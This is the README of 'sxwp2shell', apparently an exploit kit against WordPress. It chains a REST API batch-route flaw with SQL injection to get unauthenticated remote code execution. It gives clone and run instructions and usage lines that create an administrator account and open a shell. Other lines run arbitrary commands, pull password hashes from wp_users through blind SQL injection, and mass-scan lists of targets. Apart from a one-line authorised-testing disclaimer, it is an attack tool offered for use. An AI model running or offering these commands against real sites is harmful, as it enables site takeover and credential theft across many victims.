
WordPress wp2shell pre-auth RCE эксплойт-кит (CVE-2026-63030 + CVE-2026-60137)
/ / ____ / /()___ ___ / / | |/ / __ / _ / __ / / / __ / _ / / | / / / __/ / / / // / / / / / // | /_/_// //_/// //_/__//|_|
sxwp2shell — эксплойт RCE без аутентификации для WordPress через путаницу batch-маршрутов REST API (CVE-2026-63030) + SQL-инъекция (CVE-2026-60137).
Affected: WP 6.9.0–6.9.4 / 7.0.0–7.0.1
git clone https://github.com/SentinelXofficial/sxwp2shell
cd sxwp2shell
chmod +x sxwp2shell.py
Python 3.7+, только стандартная библиотека — pip install не требуется.
| Команда | Что делает |
|---|---|
check <url> | Определяет версию, batch-эндпоинт, путаницу маршрутов и SQLi |
exploit <url> | Полная цепочка RCE (SQLi → создание администратора → shell) |
read <url> | Извлечение данных через Blind SQLi |
scan <file> | Массовое сканирование целей из файла, экспорт в CSV |
python3 sxwp2shell.py check https://target.com
python3 sxwp2shell.py exploit https://target.com --cmd id
python3 sxwp2shell.py read https://target.com --query "SELECT user_pass FROM wp_users"
python3 sxwp2shell.py scan targets.txt -o results.csv
--cmd CMD Command to execute (default: id)
--query QUERY Custom SQL query
-k, --insecure Skip SSL verification
--proxy PROXY HTTP proxy
--timeout SEC Request timeout (default: 15)
--delay SEC Delay between requests
--agent AGENT Custom User-Agent
--no-color Disable colored output
-o, --output Save scan results to CSV
Только для авторизованного тестирования безопасности. Прочтите DISCLAIMER.md.